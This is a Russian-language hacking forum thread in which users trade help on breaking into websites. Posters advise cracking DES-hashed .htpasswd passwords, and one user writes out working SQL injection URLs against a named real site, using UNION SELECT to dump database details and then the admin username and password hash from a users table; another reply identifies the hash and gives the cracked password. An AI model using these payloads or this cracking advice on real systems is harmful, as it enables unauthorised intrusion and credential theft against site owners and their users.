Хотел узнать есть шелл на нем я нашел файлик .htpasswd открыл его там имеет запись виде:
Я так понял это акки, но для чего??? И в каком виде зашифрованы пароли???

посмотри рядом лежащие htaccess'ы, в них разгадка. пассы в DES'e

__________________

+toxa+ огромное спасибо ты был прав в файле htacces был урл =). Теперь нужно рассшифровать пассы)

passwordspro тебе в помощь)

__________________

Вот обьясните мне, ну вот нашел я уязвимость в скрипте вот
http://www.build.kz/index.php?page=inc/cut&sector=comp&action=sublist&cid=-1+union+select+concat(user(),char(58),version(),ch ar(58),database()),2+/*

А как мне имена таблиц то и столбцов подобрать??? версия скулы то 4 чем пользоваться? или есть базы? поделитесь пжлст)))

Вот тут список дефолтовских таблиц и полей:
http://forum.antichat.ru/showpost.php?p=465677&postcount=3
подбирай

__________________
Не занимаюсь коммерцией в любых ее проявлениях.

2 truelamer
Ручками, то есть - ручной брутфорс, а вообще - там есть табла users - тебе осталось только колонки подобрать

Спасибо
вот что я нашел
http://www.build.kz/index.php?page=inc/cut&sector=comp&action=sublist&cid=-1+union+select+concat(users_name,char(58),users_pa ssword),2+from+users%20limit+0,1/*
только проблема обьясните там что хэш пароля не до конца вылез или как? и почему то лимитом листать не получается что только один пользователь?

Там один пользователь, это MySQL хэш, расшифровывается как admin

__________________
Не занимаюсь коммерцией в любых ее проявлениях.